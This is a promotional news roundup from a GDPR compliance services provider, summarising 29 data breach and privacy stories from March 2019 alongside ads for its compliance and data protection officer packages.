GDPR Services: 29 stories worth reading from March 2019
Be informed from our GDPR Services about the latest 29 newsworthy cases and funny happenings Worldwide, identified and reported publicly during March, 2019. As these Private Data breaches have a severe negative impact on any business and highly serious legal consequences, consider a single implementation package ( on-demand GDPR COMPLIANCE ) or a recurrent monthly service of (GDPR COMPLIANCE ADD-ON) together with your dedicated data protection OFFICER package.
- Here are 20 questions you need to ask to assess your privacy readiness.
- They include where you get your data, where you can find it, and can you delete it. Basic, but helpful Twenty Questions To Help You On Your Privacy Readiness Journey
- A massive survey of thousands of Internet users around the world found that they have taken steps to protect their online data.
- Contrary to popular belief, Millennials do care about online privacy. Gen Z are the most likely people to not update their software, however. Labs survey finds privacy concerns, distrust of social media rampant with all age groups
- A security researcher collected used PCs from local pawn shops and found a staggering amount of personal data on their hard drives.
- For $600, he obtained dozens of computers, cell phones and hard disks. He ran each drive through his own scanning tool and found dozens of SSNs, email accounts, credit card numbers and even two passports. It’s Scary How Much Personal Data People Leave on Used Laptops and Phones, Researcher Finds
- The US agency FEMA has accidentally leaked the personal data of more than 2 million disaster survivors from its third-party contractor.
- This is according to an OIG report released last week. The contractor has since updated its access rules, and the report says no evidence of compromise has been yet found. FEMA ‘unnecessarily’ shared data of 2.3 million disaster victims with contractor
- This post takes a deep dive into what happened with the Marriott/Starwood breach from 2014-2018.
- Nearly 400 million guests’ private data was leaked, costing the hotel chain $3M. The chain has bad security practice, and worse response tactics. Autopsying the Marriott Data Breach: This is why insurance matters
- A very sensitive data leak from a spyware vendor has been available online for more than six weeks.
- The leak contained images and audio recordings from consumers’ phones. Troy Hunt examined the nearly 20GB of data to verify it is legit. Reporters have been unsuccessful with various attempts to contact the vendor, and are not naming the vendor to try to protect the data. This Spyware Data Leak Is So Bad We Can’t Even Tell You About It
- US Customs is targeting immigrants by tracking their vehicle license plates and matching with the cars’ location data.
- The ACLU filed a FOIA to figure this out. What is worse is that 80 local law enforcement agencies now share license plate locations with the feds. Documents Reveal ICE Using Driver Location Data From Local Police for Deportations
- Brian Krebs broke this story about how for several years now, thousands of Facebook employees have access to millions of their users’ plain text passwords.
- Soon thereafter, a Facebook VP posted this explanation that said there is no evidence that anyone abused or improperly accessed this information. That is a different statement from saying that no one accessed them. There was also no explanation of why this data, which was contained in log files, was collected to begin with. My colleague Sean Gallagher in Ars has the best analysis. Facebook Stored Hundreds of Millions of User Passwords in Plain Text for Years and Keeping FaceBook Passwords Secure and Facebook apps logged users’ passwords in plaintext, because why not
- Medical supplier Zoll suffered a breach of its email hosted on a third-party site.
- It is offering free credit monitoring, but doesn’t believe any data was compromised. ZOLL Reports Recent Data Security Incident
- Speaking of injections and scripting attacks, a majority of official EU government websites contain third-party ad tracking cookies.
- This goes against GDPR regs and comes from this report. The French government websites are the worst offenders, with more than 50 different trackers found. Cookiebot report: Hidden tracking of citizens on EU government and health sector websites
- MyPillow and Amerisleep were both hit by Magecart malware.
- The first attack happened last fall for two months, and was acknowledged by the company. The second is still ongoing. Neither informed customers about the breach. Magecart has been responsible for other recent attacks, including UK-based sneaker company Fila and several American ecommerce sites, according to this report. Its attraction is a simple deployment, with just one line of injected Javascript. Consumers May Lose Sleep Over These Two New Magecart Breaches and Criminals Use One Line of Code to Steal Card Data from E-Commerce Sites
- Here is a depressing article about why phishing is so potent.
- Using a team of tech-saavy developers, a third of the recipients were still fooled by a very cleverly-designed phish to click on the embedded link. And 14 percent of them submitted personal data as a result. This post shows the importance of security awareness training. Phishing my company. An infosec lesson for businesses
- Bruce Schneier has a long list of suggested privacy improvements for Facebook.
- Now if only Zuck was really serious about doing any of them. These include more usable privacy options, more anti-stalking protection, better transparency, ending enforcement for real names in accounts and lots more. Judging Facebook’s Privacy Shift
- The Pakistani passport office has been hit by a similar attack to last month’s one on Cairo’s Bangladeshi embassy.
- Malware loads the Scanbox data stealer and keystroke logger and uses similar obfuscation techniques to avoid detection. Attacker Tracking Users Seeking Pakistani Passport
HELPS YOU TO MEET GDPR REGULATIONS
Compliant and sustainable long-term GDPR operational behaviour. Have a rock-solid foundation for privacy procedures and GDPR mandate compliance.
Discover trending and viral stories about GDPR Services Worldwide. The remaining Private Data breaches breaches made news headlines. All these happened just in the last month.
- Networks of four major London tourist attractions have been hit with millions of cyber attacks in the past three years.
- The networks targeted were the Natural History Museum, the Imperial War Museum, Kew Gardens and the Tate. None resulted in any compromises of membership data. Millions of cyber attacks on Kew Gardens and museums as hackers target people’s financial data
- esearchers have discovered a major backdoor bug in the Swiss online voting system.
- It could make it easier for fraudulent ballots to be counted without detection. This revelation happened outside their bug bounty program announced last month. Researchers Find Critical Backdoor in Swiss Online Voting System
- This handy reference guide explains the level of privacy available with various security tools, such as VPNs, anonymous browsing sessions, and privacy-enhanced search engines.
- Each is evaluated for what data is divulged, such as DNS, IP address, and server info. Browsing Anonymously: Is It Really Anonymous?
- Two Kiev-based app developers have been sued by Facebook. The social networking company claims they have created malware-infested extensions to their platform.
- The apps have been downloaded more than 60,000 times and take the form of a series of online quizzes that were targeted at Russian speakers. Facebook sues Ukrainian browser extension makers for scraping user data
- Another open MongoDB database was hacked, this one containing API calls for Dalil, a Saudi caller ID app.
- The app has been downloaded more than five million times, and contains a wealth of private data, including phone numbers, GPS locations and user IDs of numerous other apps. Saudi caller ID Dalil app exposed data of more than 5 million users
- Four MongoDB databases spanning 190 GB and containing two billion records belonging to Verifications.io were left unsecured and breached last week.
- They were found by a researcher. Its website was taken offline and hasn’t yet been brought back. Security consultants are at work to determine the cause. Troy Hunt has some ideas how this trove was compiled on Twitter. 800+ Million Emails Leaked Online by Email Verification Service.
- Citrix’ internal network was breached by hackers last week.
- Resecurity (cited in The Hacker News) claims the Iranian-backed Iridium hacker group was responsible. They probably used a compromised password, which is characterized as password spraying. It was alerted about the breach by the FBI, which is investigating. The company posted the breach notification. It doesn’t know what data was accessed by the hackers yet. Citrix investigating unauthorized access to internal network and Citrix Data Breach – Iranian Hackers Stole 6TB of Sensitive Data.
- An extensively researched report on the online criminal underworld is now available from Bromium.
- It documents how various players profit from malware, laundering money, scams, and theft of intellectual property, credit cards and data. These are all accomplished using a variety of techniques. The entirely of “cybercrime as a service” world is staggering. Cybercrime has gone from being a simple business to an entire “Web of Profit”– which is the name of this report and is worthy of your attention. Into the Web of Profit Landmark research by Dr. Mike McGuire
- Sweet contradicting irony
- Equifax CEO Mark Begor was asked by a congresswoman to reveal his SSN and birthdate in a public hearing, and wasn’t comfortable doing so. This contradicts what the company’s legal team is saying in a class action lawsuit. video – Rep. Katie Porter asks Equifax CEO to release his Social Security number
- Sports collectable and notable baseball card vendor Topps has been hit with a Magecart formjacking attack.
- The breach notification is posted here: NOTICE OF DATA BREACH . Online customers who made purchases at the end of 2018 could be at risk of personal data, including payment cards and should monitor their credit card statements.
- This firm has developed the Pwn Index, a score for the price of leaked data from breaches.
- The average price is more than $15,000, and it is increasing. RunSafe Pwn Index
- A new report from 4iQ looks at the past year’s top 12 breaches.
- The six “Collections” was in the top spot. For the first time, underground data brokers are actively including in their offerings citizen data, such as voter data. There is some good news: the number of leaky devices is slowly on the decline. IDENTITIES IN THE WILD: THE LONG TAIL OF SMALL BREACHES
- A total of 45,000 patients of the Rush Medical System patients may have been compromised in a data breach.
- The exposed data may include names, addresses, birthdays, Social Security numbers and health insurance information. Rush Health System Reports Data Breach Affecting 45,000
- A new collection of unsecured MongoDB databases has been found.
- They contain conversations and private data from surveillance of millions of Chinese social media users, including the popular WeChat. Open MongoDB Databases Expose Chinese Surveillance Data
- Qbot is back in the news.
- Researchers have found a new campaign leveraging the banking credential stealer, using polymorphic methods that make detection difficult. It has so far infected more than 2,700 servers around the world. Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thousands of Victims
data protection OFFICER
Identify high-risk problems. Taking access and rights management into serious consideration is the foundation for a safely guarded online presence throughout your domain.